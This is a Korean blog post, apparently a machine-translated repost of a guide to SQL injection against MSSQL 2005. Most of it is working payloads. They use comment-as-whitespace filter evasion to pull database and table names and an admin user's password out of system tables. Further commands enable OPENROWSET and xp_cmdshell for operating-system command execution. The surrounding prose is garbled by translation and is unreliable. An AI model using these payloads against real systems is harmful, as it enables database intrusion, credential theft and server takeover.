mssql 2005 SQL인젝션 내용입니다.

 

자동 번역기 돌린 내용이라 매끄럽지 않네요..

 

스크립트 위주로 보심 될듯요..^^

순서대로 잘 정리되어 있군요...

흠......

 

 

 

 

 

 

mssql2005가 방법을 주입한다

정리는 아래와 같다
/**/빈칸의 작용과 같이, 어떤 때가 여과를 일부에 지날 수 있다

창고 어구가 폭발하고, 혁명적 부분의 숫자를 수정하여 차례차례 출고를 추측한다

QUOTE:
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
표 어구가 폭발하고, somedb 일부는 소에서 나열되어야 한 데이타베이스, 혁명적 숫자가 한 누가이다

QUOTE:
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
블록 어구가 폭발하여, 표 admin 속을 폭발하여 user= ' icerover ' 비밀번호단

/**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
mssql2005 묵인이 xp cmdshell을 열지 않고, openrowset는 또한 사용할 수 없다
만약 sa 권한이면, 이렇게 개방을 올 수 있다

openrowset를 개통한다

EXEC/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
xp cmdshell을 개통한다

EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--

ok,over

'Databases' 카테고리의 다른 글

참고 정보  (0) 2008.09.22
ORACLE - 리터럴 SQL 인젝션(lateral SQL injection)  (0) 2008.04.30
SELECT된 값 바로 INSERT, UPDATE 하기  (0) 2008.03.27
select 값을 다른 테이블로  (0) 2008.01.18
1000000건의 샘플 데이터 삽입  (0) 2007.12.17

+ Recent posts